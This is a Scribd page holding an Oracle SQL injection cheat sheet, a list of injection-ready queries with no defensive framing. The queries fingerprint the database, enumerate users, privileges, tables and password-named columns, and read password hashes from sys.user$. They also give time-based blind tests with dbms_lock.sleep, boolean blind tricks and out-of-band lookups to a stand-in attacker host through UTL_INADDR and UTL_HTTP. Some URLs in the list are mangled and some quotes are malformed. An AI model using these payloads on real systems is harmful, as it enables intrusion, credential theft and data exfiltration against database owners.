Scribd
Upload
116 views

Oracle SQL Injection Cheat Sheet - W

This document contains a collection of SQL queries targeting an Oracle database. The queries are retrieving information about the database instance, users, privileges, tables, and performing basic functions. Some queries appear aimed at reconnaissance of the database.

Uploaded by

Vladimir Shatsilov
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
116 views

Oracle SQL Injection Cheat Sheet - W

This document contains a collection of SQL queries targeting an Oracle database. The queries are retrieving information about the database instance, users, privileges, tables, and performing basic functions. Some queries appear aimed at reconnaissance of the database.

Uploaded by

Vladimir Shatsilov
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'

SELECT banner FROM v$version WHERE banner LIKE 'TNS%'


SELECT version FROM v$instance
SELECT 1 FROM dual
SELECT user FROM dual
SELECT username FROM all_users ORDER BY username
SELECT name FROM sys.user$
SELECT name, password, astatus FROM sys.user$
SELECT name,spare4 FROM sys.user$
SELECT * FROM session_privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'
SELECT global_name FROM global_name
SELECT name FROM v$database
SELECT instance_name FROM v$instance
SELECT SYS.DATABASE_NAME FROM DUAL
SELECT DISTINCT owner FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'
SELECT table_name FROM all_tables
SELECT owner, table_name FROM all_tables
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username)
WHERE r=9
SELECT substr('abcd', 3, 1) FROM dual
SELECT bitand(6,2) FROM dual
SELECT bitand(6,1) FROM dual
SELECT chr(65) FROM dual
SELECT ascii('A') FROM dual
SELECT CAST(1 AS char) FROM dual
SELECT CAST('1′ AS int) FROM dual
SELECT 'A' || 'B' FROM dual
BEGIN IF 1=1 THEN dbms_lock.sleep(3) ELSE dbms_lock.sleep(0) END IF END
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual
SELECT chr(65) || chr(66) FROM dual
BEGIN DBMS_LOCK.SLEEP(5) END
SELECT UTL_INADDR.get_host_name('10.0.0.1′) FROM dual
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual
SELECT UTL_INADDR.get_host_address('google.com') FROM dual
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir'
SELECT UTL_INADDR.get_host_name FROM dual
SELECT host_name FROM v$instance
SELECT UTL_INADDR.get_host_address FROM dual
SELECT UTL_INADDR.get_host_name('10.0.0.1′) FROM dual
SELECT name FROM V$DATAFILE
SYSTEM
SYSAUX
select rtrim(xmlagg(xmlelement(e, table_name ||
',')).extract('//text()').extract('//text()') ,',') from all_tables –  when using
union based SQLI with only one row
order by case when ((select 1 from user_tables where substr(lower(table_name), 1,
1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end — you must know
2 column names with the same datatype

You might also like